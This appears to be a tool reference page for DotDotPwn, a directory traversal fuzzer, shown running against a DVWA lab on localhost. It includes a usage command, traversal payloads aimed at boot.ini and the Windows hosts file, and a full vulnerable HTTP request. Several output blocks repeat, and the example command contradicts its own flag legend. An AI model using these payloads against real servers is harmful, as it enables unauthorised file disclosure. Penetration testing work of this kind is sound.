Menu
▾
▴
dotdotpwn-en
dotdotpwn
Phase(s):
Primary: Exploitation.
Secondary: Discovery.
Description:
Tool that help verifying Path Transversal vulnerabilities and exploiting them by providing the required payload.
Objective:
- Verify the presence of Path Transversal vulnerabilities on web applications.
- Obtain the required payload to exploit the Path Transversal vulnerability.
Features:
Supported technologies: FTP, TFTP, web applications (HTTP/ HTTPS).
Operative mode: Active.
Verify the presence of Path Transversal vulnerabilities on web applications.
- Verifies the vulnerability through a configurable fuzzing in which can be specified the file extension to be look for or the deep level to be used.
- Support for multiple operative systems: Windows, Unix, generic, etc.
- Support over multiple services: FTP, TFTP, HTTP; HTTPS.
- Support over multiple HTTP methods: GET, POST, HEAD, COPY, MOVE.
Reports:
Output reports: ✔
- Plain text file with a default name of HOST_mm_dd_aaaa_hh_mm.txt which can be modified by including the –r option.
Basic usage:
Exploit a Path Tranversal vulnerability on a web application. The following command starts the verification tests of a vulnerability "Path Traversal" already identified
./dotdotpwn.pl -m payload -h 127.0.0.1-p /security/requestDot.txt -k "localhost" -o filePayload_report.txt -o windows -x 9001 -b
Where:
- -m: Required module (http, http-url, payload)
- -h: Target.
- -p: File with the petition including the vulnerable parameter.
- -k: Search string in the "response" that returns the server for each "request" sent.
- -r: File where to save the results.
- -o: Specify the operative system (windows, unix, generic)
- -x: Web server port.
- -b: Stop after the first occurrence.
As the tool begins, it will display the information about the test to be run.
#####################################################
# #
# CubilFelino Chatsubo #
# Security Research Lab and [(in)Security Dark] Labs #
# chr1x.sectester.net chatsubo-labs.blogspot.com #
# #
# pr0udly present: #
# #
# ________ __ ________ __ __________ #
# \______ \ ____ _/ |_\______ \ ____ _/ |_\______ \__ _ __ ____ #
# | | \ / _ \\ __\| | \ / _ \\ __\| ___/\ \/ \/ // \ #
# | ` \( <_> )| | | ` \( <_> )| | | | \ /| | \ #
# /_______ / \____/ |__| /_______ / \____/ |__| |____| \/\_/ |___| / #
# \/ \/ \/ #
# - DotDotPwn v3.0 - #
# The Directory Traversal Fuzzer #
# http://dotdotpwn.sectester.net #
# dotdotpwn@sectester.net #
# #
# by chr1x & nitr0us #
#######################################################
[+] Report name: Reports/192.168.77.129_10-23-2013_13-03.txt
[========== TARGET INFORMATION ==========]
[+] Hostname: 127.0.0.1
[+] Setting Operating System type to "windows"
[+] Protocol: N/A
[+] Port: 9001
[=========== TRAVERSAL ENGINE ===========]
[+] Creating Traversal patterns (mix of dots and slashes)
[+] Multiplying 6 times the traversal patterns (-d switch)
[+] Creating the Special Traversal patterns
[+] Translating (back)slashes in the filenames
[+] Adapting the filenames according to the OS type detected (windows)
[+] Including Special sufixes
[+] Traversal Engine DONE ! - Total traversal tests created: 7320
# #
# CubilFelino Chatsubo #
# Security Research Lab and [(in)Security Dark] Labs #
# chr1x.sectester.net chatsubo-labs.blogspot.com #
# #
# pr0udly present: #
# #
# ________ __ ________ __ __________ #
# \______ \ ____ _/ |_\______ \ ____ _/ |_\______ \__ _ __ ____ #
# | | \ / _ \\ __\| | \ / _ \\ __\| ___/\ \/ \/ // \ #
# | ` \( <_> )| | | ` \( <_> )| | | | \ /| | \ #
# /_______ / \____/ |__| /_______ / \____/ |__| |____| \/\_/ |___| / #
# \/ \/ \/ #
# - DotDotPwn v3.0 - #
# The Directory Traversal Fuzzer #
# http://dotdotpwn.sectester.net #
# dotdotpwn@sectester.net #
# #
# by chr1x & nitr0us #
#######################################################
[+] Report name: Reports/192.168.77.129_10-23-2013_13-03.txt
[========== TARGET INFORMATION ==========]
[+] Hostname: 127.0.0.1
[+] Setting Operating System type to "windows"
[+] Protocol: N/A
[+] Port: 9001
[=========== TRAVERSAL ENGINE ===========]
[+] Creating Traversal patterns (mix of dots and slashes)
[+] Multiplying 6 times the traversal patterns (-d switch)
[+] Creating the Special Traversal patterns
[+] Translating (back)slashes in the filenames
[+] Adapting the filenames according to the OS type detected (windows)
[+] Including Special sufixes
[+] Traversal Engine DONE ! - Total traversal tests created: 7320
The tool request to press the “Enter” key to start the test and the “Ctrl+C” combination to stop it if required.
[=========== TESTING RESULTS ============]
[+] Ready to launch 3.33 traversals per second
[+] Press Enter to start the testing (You can stop it pressing Ctrl + C)
[+] Ready to launch 3.33 traversals per second
[+] Press Enter to start the testing (You can stop it pressing Ctrl + C)
While the tool progresses the application will display the payloads used in the tests.
[*] Payload with: ../boot.ini
[*] Payload with: ../windows/system32/drivers/etc/hosts
[*] Payload with: ../../boot.ini
[*] Payload with: ../../windows/system32/drivers/etc/hosts
[*] Payload with: ../../../boot.ini
[*] Payload with: ../../../windows/system32/drivers/etc/hosts
[*] Payload with: ../../../../boot.ini
[*] Payload with: ../windows/system32/drivers/etc/hosts
[*] Payload with: ../../boot.ini
[*] Payload with: ../../windows/system32/drivers/etc/hosts
[*] Payload with: ../../../boot.ini
[*] Payload with: ../../../windows/system32/drivers/etc/hosts
[*] Payload with: ../../../../boot.ini
When the application detects a successful injection by analyzing the petition Response (-k) it ends the testing process (-b). The application will display the message “VULNERABLE PAYLOAD” with the Request sent detected as vulnerable.
[*] VULNERABLE PAYLOAD:
GET /dvwa/vulnerabilities/fi/?page=../../../../../windows/system32/drivers/etc/hosts HTTP/1.1
Host: 127.0.0.1:9001
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:9001/dvwa/vulnerabilities/fi/?page=include.php
Cookie: security=low; PHPSESSID=o56i5hhsgim5rag4bjrj2ruhk6
Connection: keep-alive
GET /dvwa/vulnerabilities/fi/?page=../../../../../windows/system32/drivers/etc/hosts HTTP/1.1
Host: 127.0.0.1:9001
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:9001/dvwa/vulnerabilities/fi/?page=include.php
Cookie: security=low; PHPSESSID=o56i5hhsgim5rag4bjrj2ruhk6
Connection: keep-alive
Finally, the tool will send a summary reports of the test performed and the path where the results where exported.
[+] Fuzz testing finished after 0.97 minutes (58 seconds)
[+] Total Traversals found: 1
[+] Report saved: Reports/filePayload_report.txt
[+] Total Traversals found: 1
[+] Report saved: Reports/filePayload_report.txt
Example report:
[+] Date and Time: 10-23-2013 13:14:30
[========== TARGET INFORMATION ==========]
[+] Hostname: 127.0.0.1
[+] Setting Operating System type to "windows"
[+] Protocol: N/A
[+] Port: 9001
[=========== TRAVERSAL ENGINE ===========]
[+] Traversal Engine DONE ! - Total traversal tests created: 7320
[+] Fuzz testing finished after 0.97 minutes (58 seconds)
[+] Total Traversals found: 1
[*] VULNERABLE PAYLOAD:
GET /dvwa/vulnerabilities/fi/?page=../../../../../windows/system32/drivers/etc/hosts HTTP/1.1
Host: 127.0.0.1:9001
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:9001/dvwa/vulnerabilities/fi/?page=include.php
Cookie: security=low; PHPSESSID=o56i5hhsgim5rag4bjrj2ruhk6
Connection: keep-alive
[+] Hostname: 127.0.0.1
[+] Setting Operating System type to "windows"
[+] Protocol: N/A
[+] Port: 9001
[=========== TRAVERSAL ENGINE ===========]
[+] Traversal Engine DONE ! - Total traversal tests created: 7320
[+] Fuzz testing finished after 0.97 minutes (58 seconds)
[+] Total Traversals found: 1
[*] VULNERABLE PAYLOAD:
GET /dvwa/vulnerabilities/fi/?page=../../../../../windows/system32/drivers/etc/hosts HTTP/1.1
Host: 127.0.0.1:9001
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:9001/dvwa/vulnerabilities/fi/?page=include.php
Cookie: security=low; PHPSESSID=o56i5hhsgim5rag4bjrj2ruhk6
Connection: keep-alive
Resources:
Link: http://dotdotpwn.sectester.net
Author(s): chr1x & nitr0us
Contact: dotdotpwn [at]sectester.net
License: